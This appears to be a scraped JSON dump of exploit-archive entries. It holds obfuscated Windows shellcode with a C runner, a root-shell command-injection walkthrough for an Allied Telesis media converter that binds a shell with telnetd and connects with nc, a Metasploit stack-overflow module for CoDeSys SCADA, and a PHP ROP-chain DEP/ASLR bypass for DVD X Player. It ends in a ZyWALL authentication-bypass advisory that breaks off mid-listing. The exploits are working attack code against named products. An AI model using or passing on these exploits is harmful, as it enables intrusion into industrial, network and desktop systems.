\"\\x31\\xc0\\x50\\xb8\\x41\\x41\\x41\\x64\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x6d\\x76\\x53\\x52\\xba\\x4d\\x59\\x32\\x36\\x31\\xd1\\x51\\xb9\\x6e\\x72\\x61\\x71\\xba\\x4e\\x33\\x2d\\x38\\x31\\xd1\\x51\\xb9\\x6c\\x75\\x78\\x78\\xba\\x4c\\x34\\x34\\x31\\x31\\xd1\\x51\\xb9\\x46\\x47\\x57\\x46\\xba\\x33\\x34\\x32\\x34\\x31\\xd1\\x51\\xb9\\x56\\x50\\x47\\x64\\xba\\x38\\x35\\x33\\x44\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xa6\\xb4\\x02\\x2f\\xba\\x33\\x52\\x64\\x59\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\x68\\x41\\x41\\x64\\x64\\x58\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x01\\x41\\x60\\x32\\xba\\x48\\x61\\x4f\\x53\\x31\\xd1\\x51\\xb9\\x28\\x47\\x0d\\x2f\\xba\\x5b\\x67\\x4c\\x63\\x31\\xd1\\x51\\xb9\\x03\\x24\\x36\\x21\\xba\\x62\\x50\\x59\\x53\\x31\\xd1\\x51\\xb9\\x34\\x41\\x15\\x18\\xba\\x5d\\x32\\x61\\x6a\\x31\\xd1\\x51\\xb9\\x0c\\x05\\x1b\\x25\\xba\\x68\\x68\\x72\\x4b\\x31\\xd1\\x51\\xb9\\x2f\\x27\\x7b\\x13\\xba\\x5a\\x57\\x5b\\x52\\x31\\xd1\\x51\\xb9\\x1c\\x2c\\x02\\x3e\\xba\\x70\\x4b\\x70\\x51\\x31\\xd1\\x51\\xb9\\x3d\\x2a\\x32\\x4c\\xba\\x51\\x45\\x51\\x2d\\x31\\xd1\\x51\\xb9\\x23\\x5c\\x1c\\x19\\xba\\x4d\\x39\\x68\\x39\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xa6\\xb4\\x02\\x2f\\xba\\x33\\x52\\x64\\x59\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\x68\\x41\\x41\\x64\\x64\\x58\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x02\\x63\\x6b\\x35\\xba\\x4b\\x43\\x44\\x54\\x31\\xd1\\x51\\xb9\\x61\\x55\\x6c\\x3d\\xba\\x43\\x75\\x2d\\x71\\x31\\xd1\\x51\\xb9\\x27\\x3f\\x3b\\x1a\\xba\\x54\\x5a\\x49\\x69\\x31\\xd1\\x51\\xb9\\x25\\x34\\x12\\x67\\xba\\x4a\\x44\\x32\\x32\\x31\\xd1\\x51\\xb9\\x0b\\x02\\x1f\\x19\\xba\\x6e\\x71\\x74\\x6d\\x31\\xd1\\x51\\xb9\\x39\\x3f\\x7b\\x15\\xba\\x4d\\x5a\\x5b\\x51\\x31\\xd1\\x51\\xb9\\x35\\x15\\x03\\x2a\\xba\\x67\\x70\\x6e\\x45\\x31\\xd1\\x51\\xb9\\x3a\\x17\\x75\\x46\\xba\\x6f\\x47\\x55\\x64\\x31\\xd1\\x51\\xb9\\x26\\x35\\x0b\\x1e\\xba\\x6a\\x72\\x59\\x51\\x31\\xd1\\x51\\xb9\\x2a\\x2a\\x06\\x2a\\xba\\x66\\x65\\x45\\x6b\\x31\\xd1\\x51\\xb9\\x1d\\x20\\x35\\x5a\\xba\\x53\\x65\\x61\\x7a\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xa6\\xb4\\x02\\x2f\\xba\\x33\\x52\\x64\\x59\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\xb9\\x09\\x4c\\x7c\\x5e\\xba\\x38\\x6c\\x53\\x38\\x31\\xd1\\x51\\xb9\\x42\\x4d\\x39\\x14\\xba\\x62\\x62\\x5d\\x34\\x31\\xd1\\x51\\xb9\\x7a\\x24\\x26\\x75\\xba\\x2d\\x6b\\x74\\x31\\x31\\xd1\\x51\\xb9\\x1d\\x30\\x15\\x28\\xba\\x58\\x77\\x4a\\x6c\\x31\\xd1\\x51\\xb9\\x7c\\x2f\\x57\\x16\\xba\\x53\\x5b\\x77\\x44\\x31\\xd1\\x51\\xb9\\x42\\x25\\x2a\\x66\\xba\\x2d\\x4b\\x59\\x46\\x31\\xd1\\x51\\xb9\\x28\\x2f\\x0c\\x5a\\xba\\x4d\\x4c\\x78\\x33\\x31\\xd1\\x51\\xb9\\x20\\x2b\\x26\\x26\\xba\\x63\\x44\\x48\\x48\\x31\\xd1\\x51\\xb9\\x08\\x2b\\x23\\x67\\xba\\x66\\x52\\x77\\x34\\x31\\xd1\\x51\\xb9\\x49\\x1c\\x2e\\x48\\xba\\x69\\x7a\\x6a\\x2d\\x31\\xd1\\x51\\xb9\\x67\\x67\\x1d\\x37\\xba\\x45\\x47\\x32\\x41\\x31\\xd1\\x51\\xb9\\x03\\x33\\x0d\\x3b\\xba\\x71\\x45\\x68\\x49\\x31\\xd1\\x51\\xb9\\x39\\x6a\\x3c\\x2f\\xba\\x55\\x4a\\x6f\\x4a\\x31\\xd1\\x51\\xb9\\x37\\x44\\x1f\\x2e\\xba\\x5a\\x2d\\x71\\x4f\\x31\\xd1\\x51\\xb9\\x34\\x23\\x23\\x3b\\xba\\x68\\x77\\x46\\x49\\x31\\xd1\\x51\\xb9\\x07\\x3a\\x0a\\x14\\xba\\x73\\x48\\x65\\x78\\x31\\xd1\\x51\\xb9\\x14\\x2e\\x58\\x53\\xba\\x48\\x6d\\x37\\x3d\\x31\\xd1\\x51\\xb9\\x3e\\x3d\\x26\\x32\\xba\\x52\\x6e\\x43\\x46\\x31\\xd1\\x51\\xb9\\x33\\x3c\\x35\\x34\\xba\\x5d\\x48\\x47\\x5b\\x31\\xd1\\x51\\xb9\\x36\\x0e\\x07\\x2b\\xba\\x58\\x7a\\x44\\x44\\x31\\xd1\\x51\\xb9\\x3c\\x10\\x0a\\x37\\xba\\x49\\x62\\x78\\x52\\x31\\xd1\\x51\\xb9\\x24\\x7c\\x3b\\x36\\xba\\x61\\x31\\x67\\x75\\x31\\xd1\\x51\\xb9\\x31\\x3d\\x3b\\x27\\xba\\x62\\x64\\x68\\x73\\x31\\xd1\\x51\\xb9\\x7f\\x7d\\x3d\\x35\\xba\\x36\\x33\\x78\\x69\\x31\\xd1\\x51\\xb9\\x7c\\x13\\x0f\\x2f\\xba\\x31\\x52\\x4c\\x67\\x31\\xd1\\x51\\xb9\\x1b\\x08\\x35\\x2d\\xba\\x58\\x49\\x79\\x72\\x31\\xd1\\x51\\xb9\\x74\\x3a\\x1e\\x21\\xba\\x2d\\x65\\x52\\x6e\\x31\\xd1\\x51\\xb9\\x16\\x10\\x1f\\x17\\xba\\x34\\x58\\x54\\x52\\x31\\xd1\\x51\\xb9\\x2f\\x27\\x0c\\x6e\\xba\\x4e\\x43\\x68\\x4e\\x31\\xd1\\x51\\xb9\\x39\\x22\\x5e\\x50\\xba\\x4b\\x47\\x39\\x70\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xa6\\xb4\\x02\\x2f\\xba\\x33\\x52\\x64\\x59\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\xb8\\x41\\x41\\x41\\x65\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x1e\\x53\\x39\\x3c\\xba\\x6d\\x32\\x5b\\x50\\x31\\xd1\\x51\\xb9\\x04\\x66\\x2f\\x32\\xba\\x61\\x46\\x4b\\x5b\\x31\\xd1\\x51\\xb9\\x19\\x1e\\x0d\\x11\\xba\\x69\\x73\\x62\\x75\\x31\\xd1\\x51\\xb9\\x20\\x41\\x47\\x36\\xba\\x45\\x35\\x67\\x59\\x31\\xd1\\x51\\xb9\\x2b\\x05\\x64\\x2a\\xba\\x47\\x69\\x44\\x59\\x31\\xd1\\x51\\xb9\\x10\\x3f\\x4f\\x22\\xba\\x62\\x5a\\x38\\x43\\x31\\xd1\\x51\\xb9\\x2a\\x6f\\x2a\\x24\\xba\\x42\\x4f\\x4c\\x4d\\x31\\xd1\\x51\\xb9\\x29\\x09\\x1e\\x5e\\xba\\x47\\x6c\\x6a\\x2d\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xa6\\xb4\\x02\\x2f\\xba\\x33\\x52\\x64\\x59\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\xb8\\x41\\x41\\x41\\x6f\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x72\\x2a\\x05\\x39\\xba\\x52\\x4b\\x70\\x4d\\x31\\xd1\\x51\\xb9\\x54\\x3a\\x05\\x52\\xba\\x35\\x48\\x71\\x6f\\x31\\xd1\\x51\\xb9\\x29\\x16\\x0a\\x47\\xba\\x4c\\x36\\x79\\x33\\x31\\xd1\\x51\\xb9\\x27\\x1b\\x5b\\x3e\\xba\\x55\\x6d\\x32\\x5d\\x31\\xd1\\x51\\xb9\\x33\\x1a\\x3b\\x10\\xba\\x41\\x77\\x48\\x75\\x31\\xd1\\x51\\xb9\\x34\\x79\\x3a\\x12\\xba\\x53\\x59\\x4e\\x77\\x31\\xd1\\x51\\xb9\\x1d\\x5c\\x1e\\x28\\xba\\x72\\x32\\x78\\x41\\x31\\xd1\\x51\\xb9\\x2a\\x4e\\x5a\\x28\\xba\\x59\\x2d\\x7a\\x4b\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xa6\\xb4\\x02\\x2f\\xba\\x33\\x52\\x64\\x59\\x31\\xd3\\xff\\xd3\\xbb\\xf9\\x7e\\x5e\\x22\\xba\\x36\\x54\\x3d\\x54\\x31\\xd3\\xff\\xd3\";\r\nfprintf(stdout,\"Length: %d\\n\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)();\r\n}\r\n\r\n\r\n\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/23124", "hash": "81528c08429e6f783999626875e72992a738a8889ec3986c6b0317f72fbe428c"}, {"lastseen": "2016-04-20T01:28:43", "references": [], "description": "Exploit for hardware platform in category remote exploits", "edition": 1, "reporter": "dun", "published": "2013-01-03T00:00:00", "type": "zdt", "title": "Allied Telesis AT-MCF2000M 3.0.2 Gaining Root Shell Access", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-01-03T00:00:00", "href": "http://0day.today/exploit/description/20078", "id": "1337DAY-ID-20078", "sourceData": "####################################################################\r\n# [ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access #\r\n####################################################################\r\n#\r\n# Device: \"The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis.\r\n# With the AT-MCF2000M management module, if there is a blade failure,\r\n# insertion or removal, your traffic flow will not be interupted..\"\r\n#\r\n# Vendor: http://www.alliedtelesis.com/\r\n# Product: http://www.alliedtelesis.com/p-2265.html\r\n# Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP\r\n#\r\n###################################################################\r\n# Vulnerability:\r\n \r\nLogging in system via ssh/telnet, is necessary to using this vulnerability.\r\nAfter logging in, user has access to client menu(/sbin/AtiCli), without access to the shell.\r\nUser-supplied data are not validated properly. In section \"File Show Filesystem=system://0/m/\",\r\nis possible to inject command with using special characters: \"|;&.\r\n \r\nCommands are limited to max 25 characters. Chars / are filtered.\r\nFor example:\r\n \r\n# File Show Filesystem=system://0/m/\";echo 11111111111111111111\"\r\n File name can be only up to 25 alphanumeric characters.\r\n<>20:54:16::File Show Filesystem=system://0/m/\";echo 11111111111111111111\"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]\r\n#\r\n# File Show Filesystem=system://0/m/\";ls -al /\"\r\n<>20:55:00::File Show Filesystem=system://0/m/\";ls -al /\"::DENY(CLI_INVALID_PARAMETER)::[00.002]\r\n \r\n \r\nGetting root access:\r\n \r\nroot@debian:~# ssh 10.11.200.2\r\n \r\n-------------------------------------------------------------------------------- \r\n Allied Telesis Media Converter\r\n AT-MCF2000\r\n--------------------------------------------------------------------------------\r\nLogin: manager\r\nPassword: *******\r\n \r\n Allied Telesis Media Converter - Version 3.0.2\r\n <No System Name>\r\n# ?\r\n COnfiguration - Configuration related commands\r\n DIagnostics - Diagnostics related commands\r\n File - File related commands\r\n IP - IP related commands\r\n Logging - Logging related commands\r\n Ntp - Ntp related commands\r\n Ping - Ping a host\r\n System - System related commands\r\n Telnet - Telnet related commands\r\n SNMP - Snmp related commands\r\n SSh - SSH related commands\r\n User - User management commands\r\n CLear - Clear the terminal screen\r\n Help - CLI help information\r\n EXit - Exit\r\n# File Show Filesystem=system://0/m/\r\nModule 0/M File System:\r\n-rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg\r\n-rw-r--r-- 1 0 0 2612 Jan 1 15:27 BM_0_2.cfg\r\n-rw-r--r-- 1 0 0 1355 Jan 1 15:27 MM.cfg\r\n-rw-r--r-- 1 0 0 310 Dec 31 13:17 file.inf\r\n-rw-r--r-- 1 0 0 6609 Jan 1 15:27 mcf_chassis0.cfg\r\n# File Show Filesystem=system://0/m/BM_0_1.cfg\r\nModule 0/M File System:\r\n-rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg\r\n# File Show Filesystem=system://0/m/test\r\nModule 0/M File System:\r\nls: test: No such file or directory\r\n \r\n<>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]\r\n# File Show Filesystem=system://0/m/|id\r\nModule 0/M File System:\r\nuid=0 gid=0\r\n# File Show Filesystem=system://0/m/|\"telnetd -l${SHELL} -p30\"\r\nModule 0/M File System:\r\n \r\n<>19:00:41::File Show Filesystem=system://0/m/|\"telnetd -l${SHELL} -p30\"::COMPL::[00.061]\r\n# File Show Filesystem=system://0/m/|\"ps aux|grep telnet\"\r\nModule 0/M File System:\r\n 25 0 336 S /usr/sbin/telnetd -l /sbin/AtiCli\r\n 497 0 192 S telnetd -l/bin/sh -p30\r\n \r\n<>19:01:02::File Show Filesystem=system://0/m/|\"ps aux|grep telnet\"::COMPL::[00.117]\r\n# exit\r\n<>19:01:40::exit::COMPL::[00.001]\r\n#\r\nlogging out.\r\nConnection to 10.11.200.2 closed.\r\n \r\nroot@debian:~# nc 10.11.200.2 30\r\n \r\n \r\nBusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n \r\n/ # id\r\nuid=0 gid=0\r\n/ # uname -a\r\nLinux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown\r\n/ # cat /proc/version\r\nLinux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009\r\n/ # ls -al \r\ndrwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 .\r\ndrwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 ..\r\n-rw-r--r-- 1 0 0 125 Jan 1 19:10 .ash_history\r\n-rw-r--r-- 1 0 0 0 Jan 1 13:24 1\r\ndrwxr-xr-x 2 0 0 1024 Aug 10 2009 bin\r\ndrwxr-xr-x 3 0 0 0 Jan 1 15:27 cfg\r\ndrwxr-xr-x 4 0 0 2048 Aug 10 2009 dev\r\ndrwxr-xr-x 10 0 0 1024 Jan 1 1970 etc\r\ndrwxr-xr-x 4 0 0 1024 Aug 10 2009 lib\r\ndrwxr-xr-x 2 0 0 12288 Aug 10 2009 lost+found\r\ndrwxr-xr-x 3 0 0 1024 Aug 10 2009 mnt\r\ndr-xr-xr-x 49 0 0 0 Jan 1 1970 proc\r\ndrwx------ 2 0 0 1024 Aug 10 2009 root\r\ndrwxr-xr-x 2 0 0 1024 Aug 10 2009 sbin\r\ndrwxrwxrwt 2 0 0 1024 Jan 1 19:06 tmp\r\ndrwxr-xr-x 6 0 0 1024 Aug 10 2009 usr\r\ndrwxr-xr-x 7 0 0 1024 Jan 1 1970 var\r\n/ # echo pwnd! :) & exit\r\npwnd! :)\r\nConnection closed by foreign host.\r\nroot@debian:~#\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/20078", "hash": "f308bfb1047309922d19e5486d48efec9a2df8ab47905fca12006a2f6ee4e8af"}, {"lastseen": "2016-04-20T00:58:25", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "metasploit", "published": "2011-12-13T00:00:00", "type": "zdt", "title": "CoDeSys SCADA v2.3 Webserver Stack Buffer Overflow", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-12-13T00:00:00", "href": "http://0day.today/exploit/description/17273", "id": "1337DAY-ID-17273", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CoDeSys SCADA v2.3 Webserver Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a remote stack buffer overflow vulnerability in\r\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version 1.1.9.9.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Celil UNUVER', # Original discovery and exploit\r\n 'TecR0c', # Module Metasploit\r\n 'sinn3r'\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],\r\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'DisablePayloadHandler' => 'false',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'size' => 4000,\r\n 'BadChars' => \"\\x00\\x09\\x0a\\x3f\\x20\\x23\\x5e\",\r\n },\r\n \r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x7E4456F7,\r\n 'Offset' => 775\r\n }\r\n ], # jmp esp user32\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2011',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options([Opt::RPORT(8080)], self.class)\r\n end\r\n \r\n def check\r\n connect\r\n sock.put(\"GET / HTTP/1.1\\r\\n\\r\\n\")\r\n res = sock.get(-1, 3)\r\n disconnect\r\n \r\n # Can't flag the web server as vulnerable, because it doesn't\r\n # give us a version\r\n vprint_line(res)\r\n if res =~ /3S_WebServer/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n connect\r\n \r\n buffer = rand_text(target['Offset'])\r\n buffer << [target.ret].pack('V')\r\n buffer << make_nops(8)\r\n buffer << payload.encoded\r\n \r\n sploit = \"GET /#{buffer} HTTP/1.0\\r\\n\\r\\n\\r\\n\"\r\n \r\n print_status(\"Trying target #{target.name}...\")\r\n sock.put(sploit)\r\n res = sock.recv(1024)\r\n print_line(res)\r\n \r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\ntarget.ret verified on:\r\n- Win XP SP3 unpatched\r\n- Win XP SP3 fully-patched\r\n- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed\r\n=end\r\n\r\n\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/17273", "hash": "17ee6ba2e70de5d6f200d6c0a0d53d01e178c97a5f2362f4bc67ffa6b642f835"}, {"lastseen": "2016-04-20T00:44:03", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "Rew", "published": "2011-09-07T00:00:00", "type": "zdt", "title": "DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-09-07T00:00:00", "href": "http://0day.today/exploit/description/16867", "id": "1337DAY-ID-16867", "sourceData": "<?php\r\n \r\n/*\r\nTitle: DVD X Player 5.5 Pro (DEP + ASLR Bypass) Exploit\r\nDate: Sep 08, 2011\r\nAuthor: Rew (rew@leethax.info)\r\nDiscovered by: Blake (http://www.exploit-db.com/exploits/17788/)\r\nLink: http://www.dvd-x-player.com/download/DVDXPlayerSetup.exe\r\nTested on: WinXP Pro SP3 + OptOut DEP\r\nCVE: NA (0day)\r\n \r\nDEP bypass via VirtualProtect\r\nASLR bypass via non-aslr module (EPG.dll)\r\nNo SafeSEH so we use the SEH @ 616 bytes\r\n \r\nThis is my very first DEP + ASLR bypassing exploit. awesomeface.jpg\r\nIf it looks clunky and rediculous, rather than hating, drop me a line\r\nand offer some advice for improvement. irc.rizon.net#beer\r\n \r\nMany thanks to Corelan Team for their wonderful article here...\r\nhttp://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/\r\n*/\r\n \r\n$padding_1 = str_repeat(\"A\", 336);\r\n \r\n// ROP till ya drop!\r\n$rop = \"\\x08\\xd9\\x62\\x61\"; // push esp; sub eax, 20; pop ebx; retn\r\n$rop .= \"JUNK\";\r\n$rop .= \"\\x24\\x01\\x64\\x61\"; // xchg eax, ebx; retn\r\n$rop .= \"\\xe2\\xe4\\x60\\x61\"; // xchg eax, ecx; add al, [eax]; add esp, 4; mov eax, esi; pop esi; retn 4\r\n$rop .= \"JUNK\";\r\n$rop .= \"JUNK\";\r\n$rop .= \"\\x02\\x67\\x62\\x61\"; // pop eax; retn\r\n$rop .= \"JUNK\";\r\n$rop .= \"\\x08\\x11\\x01\\x10\"; // ptr to VirtualProtect\r\n$rop .= \"\\x37\\x13\\x63\\x61\"; // pop edi; pop esi; retn\r\n$rop .= \"\\x1b\\x76\\x61\\x61\"; // retn\r\n$rop .= \"\\x50\\x8b\\x62\\x61\"; // jmp [eax]\r\n$rop .= \"\\x3f\\x85\\x60\\x61\"; // pop ebp; retn\r\n$rop .= \"\\x66\\x56\\x60\\x61\"; // add esp, 8; retn // return of VirtualProtect\r\n$rop .= \"\\x50\\x17\\x60\\x61\"; // pop ebx; retn\r\n$rop .= \"\\x84\\xcd\\x6f\\x83\"; // this will be added to the pointer already in edx to wrap and get 0x00000040\r\n$rop .= \"\\x9e\\x76\\x62\\x61\"; // add edx, ebx; pop ebx; retn 10\r\n$rop .= \"\\x01\\x01\\x01\\x01\"; // dword size // pretty big, but whatever, easier than dealing with nulls\r\n$rop .= \"\\x31\\x08\\x62\\x61\"; // pushad; retn\r\n$rop .= \"JUNK\";\r\n$rop .= \"JUNK\";\r\n$rop .= \"JUNK\";\r\n$rop .= \"JUNK\";\r\n$rop .= \"JUNK\";\r\n// Couldn't find a good null-free jmp esp, so we do some more ROP to\r\n// get esp in eax and then jmp eax to our shellcode on the stack.\r\n$rop .= \"\\x08\\xd9\\x62\\x61\"; // push esp; sub eax, 20; pop ebx; retn\r\n$rop .= \"\\x24\\x01\\x64\\x61\"; // xchg eax, ebx; retn\r\n$rop .= \"\\xf0\\x8d\\x62\\x61\"; // add eax, 0c; retn // one more little nudge\r\n$rop .= \"\\x5b\\x5e\\x62\\x61\"; // jmp eax;\r\n \r\n$padding_2 = str_repeat(\"\\x90\", (274 - strlen($rop)));\r\n \r\n$jmp = \"\\xeb\\x04\"; // over the pivot and into the shellcode\r\n \r\n$pivot = \"\\xae\\x74\\x60\\x61\"; // add esp, 408; retn 4\r\n \r\n// Win32 XP SP3 WinExec cmd.exe\r\n$shellcode =\r\n\"\\x8b\\xec\\x55\\x8b\\xec\\x68\\x65\\x78\\x65\\x2F\" .\r\n\"\\x68\\x63\\x6d\\x64\\x2e\\x8d\\x45\\xf8\\x50\\xb8\" .\r\n\"\\xc7\\x93\\xc2\\x77\\xff\\xd0\";\r\n \r\n$exploit = $padding_1.$rop.$padding_2.$jmp.$pivot.$shellcode;\r\n \r\nfwrite(fopen(\"eggsploit.plf\", \"w\"), $exploit);\r\n \r\n?>\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/16867", "hash": "1a9afd9b2437ec54bbbd28467a7b0bc156e55a8ceaf7b50f86b376f42b7d3efa"}, {"lastseen": "2016-04-20T01:47:28", "references": [], "description": "Exploit for hardware platform in category remote exploits", "edition": 1, "reporter": "RedTeam Pentesting", "published": "2011-05-04T00:00:00", "type": "zdt", "title": "ZyWALL USG Appliance Multiple Vulnerabilities", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-05-04T00:00:00", "href": "http://0day.today/exploit/description/16040", "id": "1337DAY-ID-16040", "sourceData": "Advisory: Authentication Bypass in Configuration Import and Export of\r\n ZyXEL ZyWALL USG Appliances\r\n \r\nUnauthenticated users with access to the management web interface of\r\ncertain ZyXEL ZyWALL USG appliances can download and upload\r\nconfiguration files, that are applied automatically.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-003\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n \r\n \r\nIntroduction\r\n============\r\n \r\n``The ZyWALL USG (Unified Security Gateway) Series is the \"third\r\ngeneration\" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n \r\n(From the vendor's homepage)\r\n \r\n \r\nMore Details\r\n============\r\n \r\nDuring a penetration test, a ZyXEL ZyWALL USG appliance was found and\r\ntested for security vulnerabilities. The following sections first\r\ndescribe, how the appliance's filesystem can be extracted from the\r\nencrypted firmware upgrade zip files. Afterwards it is shown, how\r\narbitrary configuration files can be up- and downloaded from the\r\nappliance. This way, a custom user account with a chosen password can\r\nbe added to the running appliance without the need of a reboot.\r\n \r\n \r\nDecrypting the ZyWALL Firmware Upgrade Files\r\n--------------------------------------------\r\n \r\nFirmware upgrade files for ZyXEL ZyWALL USG appliances consist of a\r\nregularly compressed zip file, which contains, among others, two\r\nencrypted zip files with the main firmware. For example, the current\r\nfirmware version 2.21(BQD.2) for the ZyWALL USG 20 (\"ZyWALL USG\r\n20_2.21(BDQ.2)C0.zip\") contains the following files:\r\n \r\n -rw-r--r-- 1 user user 43116374 Sep 30 2010 221BDQ2C0.bin\r\n -rw-r--r-- 1 user user 7354 Sep 30 2010 221BDQ2C0.conf\r\n -rw-r--r-- 1 user user 28395 Sep 30 2010 221BDQ2C0.db\r\n -rw-r--r-- 1 user user 703402 Oct 12 17:48 221BDQ2C0.pdf\r\n -rw-r--r-- 1 user user 3441664 Sep 30 2010 221BDQ2C0.ri\r\n -rw-r--r-- 1 user user 231 Sep 30 2010 firmware.xml\r\n \r\nThe files 221BDQ2C0.bin and 221BDQ2C0.db are encrypted zip files that\r\nrequire a password for decompression. Listing the contents is\r\npossible:\r\n \r\n $ unzip -l 221BDQ2C0.bin\r\n Archive: 221BDQ2C0.bin\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 40075264 2010-09-15 06:32 compress.img\r\n 0 2010-09-30 04:48 db/\r\n 0 2010-09-30 04:48 db/etc/\r\n 0 2010-09-30 04:48 db/etc/zyxel/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 